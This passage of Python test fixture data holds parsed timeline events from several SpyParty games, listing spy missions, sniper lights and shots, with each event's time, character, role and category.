"banana bread uttered.",
(None,),
(2 * 60 + 16.2),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"02:15.7",
"double agent contacted.",
(Characters.Bling,),
(2 * 60 + 15.7),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Contact,
ActionTest.NoAT,
),
(
"sniper",
"02:14.0",
"marked neutral suspicion.",
(Characters.General,),
(2 * 60 + 14.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:13.8",
"marked less suspicious.",
(Characters.General,),
(2 * 60 + 13.8),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:11.7",
"marked less suspicious.",
(Characters.Morgan,),
(2 * 60 + 11.7),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:11.0",
"marked less suspicious.",
(Characters.Sari,),
(2 * 60 + 11.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:01.0",
"marked suspicious.",
(Characters.Oprah,),
(2 * 60 + 01.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.2",
"spy leaves conversation.",
(None,),
(2 * 60 + 00.2),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.2",
"spy left conversation with double agent.",
(Characters.Bling,),
(2 * 60 + 00.2),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
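# Game 2409467229694115669: a 94% flirt and completed statue inspections before the sniper shoots a civilian, ending the game.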
(
"2409467229694115669",
[
(
"sniper",
"02:14.0",
"marked neutral suspicion.",
(Characters.General,),
(2 * 60 + 14.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:13.8",
"marked less suspicious.",
(Characters.General,),
(2 * 60 + 13.8),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:11.7",
"marked less suspicious.",
(Characters.Morgan,),
(2 * 60 + 11.7),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:11.0",
"marked less suspicious.",
(Characters.Sari,),
(2 * 60 + 11.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:01.0",
"marked suspicious.",
(Characters.Oprah,),
(2 * 60 + 01.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.2",
"spy leaves conversation.",
(None,),
(2 * 60 + 00.2),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.2",
"spy left conversation with double agent.",
(Characters.Bling,),
(2 * 60 + 00.2),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:56.9",
"spy enters conversation.",
(None,),
(1 * 60 + 56.9),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:53.2",
"waiter offered drink.",
(Characters.Queen,),
(1 * 60 + 53.2),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:51.0",
"rejected drink from waiter.",
(Characters.Queen,),
(1 * 60 + 51.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:51.0",
"waiter stopped offering drink.",
(Characters.Queen,),
(1 * 60 + 51.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:49.1",
"action triggered: seduce target",
(None,),
(1 * 60 + 49.1),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:49.1",
"begin flirtation with seduction target.",
(Characters.Wheels,),
(1 * 60 + 49.1),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:48.0",
"action test green: seduce target",
(None,),
(1 * 60 + 48.0),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"01:48.0",
"flirt with seduction target: 94%",
(Characters.Wheels,),
(1 * 60 + 48.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:39.4",
"spy leaves conversation.",
(None,),
(1 * 60 + 39.4),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:31.9",
"picked up statue.",
(None,),
(1 * 60 + 31.9),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:31.9",
"flirtation cooldown expired.",
(None,),
(1 * 60 + 31.9),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:28.0",
"action triggered: inspect statues",
(None,),
(1 * 60 + 28.0),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:27.4",
"action test white: inspect statues",
(None,),
(1 * 60 + 27.4),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Inspect,
ActionTest.White,
),
(
"spy",
"01:23.0",
"right statue inspected.",
(None,),
(1 * 60 + 23.0),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:22.4",
"action triggered: inspect statues",
(None,),
(1 * 60 + 22.4),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:21.8",
"action test white: inspect statues",
(None,),
(1 * 60 + 21.8),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Inspect,
ActionTest.White,
),
(
"sniper",
"01:20.1",
"marked spy suspicious.",
(Characters.Queen,),
(1 * 60 + 20.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:18.4",
"held statue inspected.",
(None,),
(1 * 60 + 18.4),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:18.4",
"all statues inspected.",
(None,),
(1 * 60 + 18.4),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:17.1",
"put back statue.",
(None,),
(1 * 60 + 17.1),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:06.5",
"spy enters conversation.",
(None,),
(1 * 60 + 06.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:05.0",
"took shot.",
(Characters.Boots,),
(1 * 60 + 05.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperShot,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"01:01.6",
"sniper shot civilian.",
(Characters.Boots,),
(1 * 60 + 01.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"4863254294007289095",
[
(
"spy",
"00:24.1",
"real banana bread started.",
(None,),
(00 * 60 + 24.1),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:23.4",
"action test red: contact double agent",
(None,),
(00 * 60 + 23.4),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Contact,
ActionTest.Red,
),
(
"spy",
"00:19.1",
"banana bread uttered.",
(None,),
(00 * 60 + 19.1),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:18.1",
"double agent contacted.",
(Characters.Salmon,),
(00 * 60 + 18.1),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:08.9",
"45 seconds added to match.",
(None,),
(00 * 60 + 08.9),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.7",
"spy leaves conversation.",
(None,),
(00 * 60 + 50.7),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.7",
"spy left conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 50.7),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.5",
"spy enters conversation.",
(None,),
(00 * 60 + 50.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.5",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 50.5),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:49.2",
"spy picks up briefcase.",
(None,),
(00 * 60 + 49.2),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:49.2",
"picked up fingerprintable briefcase.",
(None,),
(00 * 60 + 49.2),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:47.6",
"spy leaves conversation.",
(None,),
(00 * 60 + 47.6),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.6",
"spy left conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 47.6),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.3",
"spy enters conversation.",
(None,),
(00 * 60 + 47.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.3",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 47.3),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:45.2",
"action triggered: fingerprint ambassador",
(None,),
(00 * 60 + 45.2),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:45.2",
"started fingerprinting briefcase.",
(None,),
(00 * 60 + 45.2),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:44.3",
"fingerprinted briefcase.",
(None,),
(00 * 60 + 44.3),
None,
(None,),
(None,),
TimelineCategory.Briefcase | TimelineCategory.MissionPartial,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:42.8",
"spy returns briefcase.",
(None,),
(00 * 60 + 42.8),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:41.1",
"45 seconds added to match.",
(None,),
(00 * 60 + 41.1),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:25.9",
"45 seconds added to match.",
(None,),
(1 * 60 + 25.9),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:10.8",
"45 seconds added to match.",
(None,),
(2 * 60 + 10.8),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.7",
"spy leaves conversation.",
(None,),
(2 * 60 + 53.7),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.7",
"spy left conversation with double agent.",
(Characters.Salmon,),
(2 * 60 + 53.7),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:51.5",
"spy enters conversation.",
(None,),
(2 * 60 + 51.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:51.5",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(2 * 60 + 51.5),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:45.0",
"double agent left conversation with spy.",
(Characters.Salmon,),
(2 * 60 + 45.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:44.6",
"ambassador's personal space violated.",
(Characters.Morgan, Characters.Taft),
(2 * 60 + 44.6),
None,
(Roles.Ambassador, Roles.Spy),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:43.3",
"spy leaves conversation.",
(None,),
(2 * 60 + 43.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:39.1",
"spy enters conversation.",
(None,),
(2 * 60 + 39.1),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"highlight_and_bad_time",
[
(
"spy",
"02:33.3",
"guest list purloined.",
(Characters.Teal,),
(2 * 60 + 33.3),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionComplete,
Missions.Purloin,
ActionTest.NoAT,
),
(
"sniper",
"02:30.1",
"marked suspicious.",
(Characters.Teal,),
(2 * 60 + 30.1),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:26.7",
"marked spy suspicious.",
(Characters.Morgan,),
(2 * 60 + 26.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:24.1",
"marked less suspicious.",
(Characters.Wheels,),
(2 * 60 + 24.1),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:15.2",
"flirtation cooldown expired.",
(None,),
(2 * 60 + 15.2),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:13.5",
"action triggered: seduce target",
(None,),
(2 * 60 + 13.5),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:13.5",
"begin flirtation with seduction target.",
(Characters.Teal,),
(2 * 60 + 13.5),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"02:13.4",
"marked less suspicious.",
(Characters.General,),
(2 * 60 + 13.4),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:13.0",
"marked less suspicious.",
(Characters.Boots,),
(2 * 60 + 13.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:12.8",
"action test white: seduce target",
(None,),
(2 * 60 + 12.8),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.White,
),
(
"spy",
"02:12.8",
"flirt with seduction target: 68%",
(Characters.Teal,),
(2 * 60 + 12.8),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"02:12.3",
"marked less suspicious.",
(Characters.Smallman,),
(2 * 60 + 12.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:08.3",
"marked suspicious.",
(Characters.Disney,),
(2 * 60 + 08.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:52.6",
"marked book.",
(Characters.Salmon,),
(1 * 60 + 52.6),
None,
(Roles.Civilian,),
(Books.Green,),
TimelineCategory.SniperLights | TimelineCategory.Books,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:41.7",
"waiter offered drink.",
(Characters.Morgan,),
(1 * 60 + 41.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:38.1",
"got drink from waiter.",
(Characters.Morgan,),
(1 * 60 + 38.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:38.1",
"waiter stopped offering drink.",
(Characters.Morgan,),
(1 * 60 + 38.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:33.0",
"marked suspicious.",
(Characters.Bling,),
(1 * 60 + 33.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:31.9",
"sipped drink.",
(Characters.Morgan,),
(1 * 60 + 31.9),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:27.8",
"flirtation cooldown expired.",
(None,),
(1 * 60 + 27.8),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:26.8",
"action triggered: seduce target",
(None,),
(1 * 60 + 26.8),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:26.8",
"begin flirtation with seduction target.",
(Characters.Teal,),
(1 * 60 + 26.8),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:25.4",
"action test ignored: seduce target",
(None,),
(1 * 60 + 25.4),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Ignored,
),
(
"spy",
"01:25.4",
"flirt with seduction target: 100%",
(Characters.Teal,),
(1 * 60 + 25.4),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:25.4",
"target seduced.",
(Characters.Teal,),
(1 * 60 + 25.4),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionComplete,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"01:08.3",
"marked neutral suspicion.",
(Characters.Bling,),
(1 * 60 + 08.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:08.1",
"sipped drink.",
(Characters.Morgan,),
(1 * 60 + 08.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:49.1",
"took last sip of drink.",
(Characters.Morgan,),
(00 * 60 + 49.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"00:45.4",
"took shot.",
(Characters.Disney,),
(00 * 60 + 45.4),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperShot,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"00:41.6",
"sniper shot civilian.",
(Characters.Disney,),
(00 * 60 + 41.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"-4198543829091342944",
[
(
"spy",
"01:03.6",
"spy joined conversation with double agent.",
(Characters.Boots,),
(1 * 60 + 03.6),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:59.0",
"action triggered: contact double agent",
(None,),
(00 * 60 + 59.0),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:59.0",
"real banana bread started.",
(None,),
(00 * 60 + 59.0),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:58.0",
"action test white: contact double agent",
(None,),
(00 * 60 + 58.0),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Contact,
ActionTest.White,
),
(
"sniper",
"00:54.6",
"marked less suspicious.",
(Characters.Wheels,),
(00 * 60 + 54.6),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"00:53.2",
"marked neutral suspicion.",
(Characters.Wheels,),
(00 * 60 + 53.2),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:51.6",
"banana bread uttered.",
(None,),
(00 * 60 + 51.6),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:51.0",
"double agent contacted.",
(Characters.Boots,),
(00 * 60 + 51.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Contact,
ActionTest.NoAT,
),
(
"sniper",
"00:49.8",
"marked less suspicious.",
(Characters.Wheels,),
(00 * 60 + 49.8),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"00:48.6",
"marked less suspicious.",
(Characters.Salmon,),
(00 * 60 + 48.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:42.5",
"spy leaves conversation.",
(None,),
(00 * 60 + 42.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:42.5",
"spy left conversation with double agent.",
(Characters.Boots,),
(00 * 60 + 42.5),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:36.5",
"action triggered: seduce target",
(None,),
(00 * 60 + 36.5),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:36.5",
"begin flirtation with seduction target.",
(Characters.Wheels,),
(00 * 60 + 36.5),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:35.3",
"action test green: seduce target",
(None,),
(00 * 60 + 35.3),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"00:34.0",
"flirt with seduction target: 85%",
(Characters.Wheels,),
(00 * 60 + 34.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:25.3",
"put book in bookcase.",
(None,),
(00 * 60 + 25.3),
None,
(None,),
(Books.Blue, Books.Blue),
TimelineCategory.Books,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"00:15.6",
"marked less suspicious.",
(Characters.Morgan,),
(00 * 60 + 15.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:15.5",
"flirtation cooldown expired.",
(None,),
(00 * 60 + 15.5),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:09.8",
"spy enters conversation.",
(None,),
(00 * 60 + 09.8),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:08.5",
"action triggered: seduce target",
(None,),
(00 * 60 + 08.5),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:08.5",
"begin flirtation with seduction target.",
(Characters.Wheels,),
(00 * 60 + 08.5),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:07.2",
"action test green: seduce target",
(None,),
(00 * 60 + 07.2),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"00:07.2",
"flirt with seduction target: 100%",
(Characters.Wheels,),
(00 * 60 + 07.2),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:07.2",
"target seduced.",
(Characters.Wheels,),
(00 * 60 + 07.2),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionComplete,
Missions.Seduce,
ActionTest.NoAT,
),
(
"game",
"00:07.2",
"missions completed. 10 second countdown.",
(None,),
(00 * 60 + 07.2),
None,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"-00:00.0",
"took shot.",
(Characters.Rocker,),
(00 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperShot,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"-00:00.2",
"overtime!",
(None,),
-(00 * 60 + 00.2),
None,
(None,),
(None,),
TimelineCategory.Overtime,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"-00:00.6",
"spy leaves conversation.",
(None,),
-(00 * 60 + 00.6),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"-00:03.6",
"sniper shot civilian.",
(Characters.Rocker,),
-(00 * 60 + 03.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"bad_time",
[
(
"spy",
"01:54.1",
"sipped drink.",
(Characters.Salmon,),
114.1,
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:46.8",
"spy leaves conversation.",
(None,),
106.8,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:42.4",
"flirtation cooldown expired.",
(None,),
102.4,
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:34.1",
"delegated purloin timer expired.",
(None,),
94.1,
None,
(None,),
(None,),
TimelineCategory.Drinks,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:33.6",
"took last sip of drink.",
(Characters.Salmon,),
93.6,
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:30.8",
"picked up statue.",
(None,),
90.8,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:28.1",
"picked up fingerprintable statue.",
(None,),
88.1,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"01:27.3",
"action triggered: inspect statues",
(None,),
87.3,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:26.0",
"action test white: inspect statues",
(None,),
86.0,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Inspect,
ActionTest.White,
),
(
"spy",
"01:22.3",
"held statue inspected.",
(None,),
82.3,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:22.3",
"all statues inspected.",
(None,),
82.3,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:21.6",
"action triggered: fingerprint ambassador",
(None,),
81.6,
None,
(None,),
